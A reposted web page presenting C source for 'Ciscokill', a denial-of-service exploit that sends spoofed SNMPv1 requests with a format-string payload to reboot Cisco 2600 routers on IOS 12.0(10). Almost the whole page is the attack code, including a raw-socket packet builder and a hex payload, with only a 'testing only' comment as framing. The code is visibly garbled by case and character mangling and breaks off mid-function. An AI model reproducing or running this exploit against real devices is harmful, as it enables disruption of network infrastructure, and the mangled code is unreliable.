SNMP protocol implements an attack code with multiple vulnerabilities

zhaozj2021-02-16  69

Attackers can also reject service attacks without knowing "Community String". The following code will restart the Cisco 2600 router:

/ * This Program Send a spous SNMPV1 Get Request That Cause System Reboot on Cisco 2600 Routers with iOS Version 12.0 (10) Author: kundra@tiscali.it ... don't be lame use for testing only! .. :) * / # include #include #include #include #include #include < netinet / ip.h> #include #include struct in_addr sourceip_addr; struct in_addr destip_addr; struct sockaddr_in dest; struct ip * IP; struct udphdr * UDP; int p_number = 1 , SOK, DATASIZE, I = 0; Char * Packet, * Source, * Target; Char * Packetck; Char * Data, C; Char snmpkill [] = "/ x30 / x81 / x04 / x01 / x00 / x04 / X06 / X70 / x75 / x62 / x6c / x69 / x63 / xa0 / x81 "" / xa1 / x02 / x02 / x00 / x00 / x02 / x01 / x00 / x30 / x81 / x94 / x30 / X81 "" / x91 / x06 / x73 / x25 / x73 / x25 / x73 / x25 / x25 / x73 "" / x25 / x73 / x25 / x73 / x25 / x73 / X25 / X73 / X25 / X73 / X25 / X73 / X25 / X73 / X25 / X73 "" / x25 / x73 / x25 / x73 / x25 / x25 / x73 / x25 / x73 / x25 / x73 / X25 / X73 "" / x25 / x73 / x25 / x25 / x25 / x25 / x73 / x25 / x73 / X25 / X73 / X25 / X73 "" / x25 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 "" / x25 / x73 / x25 / X73 / X25 / X73 / X25 / X73 / X25 / X73 / X25 / X73 / X25 / X73 / X25 / X73 "" / x25 / x73 / x25 / x73 / x25 / x25 / x73 / x25 / X73 / X25 / X73 / X25 / X73 "" / x25 / x73 / x25 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 / x25 / x73 "" / x25 / x73 / X25 / X73 / X25 / X73 / X81 / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / X7F "/ X05"; struct pseudoudp {u_long ipSource; u_long ipdest; char zero; char proto; u_short length ;} * psudp; in_cksum (unsigned short * ptr, int nbytes) {register long sum; / * assumes long == 32 bits * / u_short oddbyte;

Register u_short answer; / * assumes u_short == 16 bits * // * * Our Algorithm is Simple, USING A 32-bit Accumulator (SUM), * WE Add Sequential 16-Bit Words to it, and at the end, fold back * all the carry bits from the top 16 bits inTo the Lower 16 bits. * / sum = 0; while (nbytes> 1) {SUM = * PTR ; nbytes - = 2;} / * mop up an odd byte, if Necessary * / if (nbytes == 1) {ODDBYTE = 0; / * Make Sure Top Half Is Zero * / * ((U_CHAR *) & ODDBYTE) = * (u_char *) PTR; / * One Byte Only * / SUM = oddbyte;} / * * add back carry outs from top 16 bits to low 16 bits. * / sum = (sum >> 16) (sum & 0xfff); / * Add high-16 to low-16 * / SUM = (SUM >> 16); / * add carry * / answer = ~ sum; / * Ones-completion, the truncate to 16 bits * / return (answer);} void usage (void) {Printf ("Kundera Ciscokill v1.0 / n "); Printf (" USAGE: Ciscokill [-n number of packets] [-s source ip_addr] -t ip_target / n ");} int main (int Argc, char ** argv) {ix (argc <2) {usage (); exit (1);} while ((c = getopt (argc, argv, "s: t: n:)) ! = EOF) {Switch (c) {CASE 'S': Source = OPTARG; Break; Case 'N': p_number = atoi (OPTARG); Break; Case 'T': target = OPTARG;}} f ((SOK) = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) <0) {printf ( "Can not create socket./n"); exit (EXIT_FAILURE);} destip_addr.s_addr = inet_addr (target); sourceip_addr.s_addr = inet_addr (source ); DataSize = sizeof (snmpkill); packet = (char *) malloc (20 8 DATASize); IP = (struct ip *) packet; Memset (packet, 0, sizeof (packet)); IP-> IP_DST. s_addr = destip_addr.s_addr; ip-> ip_src.s_addr =

转载请注明原文地址:https://www.9cbs.com/read-15232.html

New Post(0)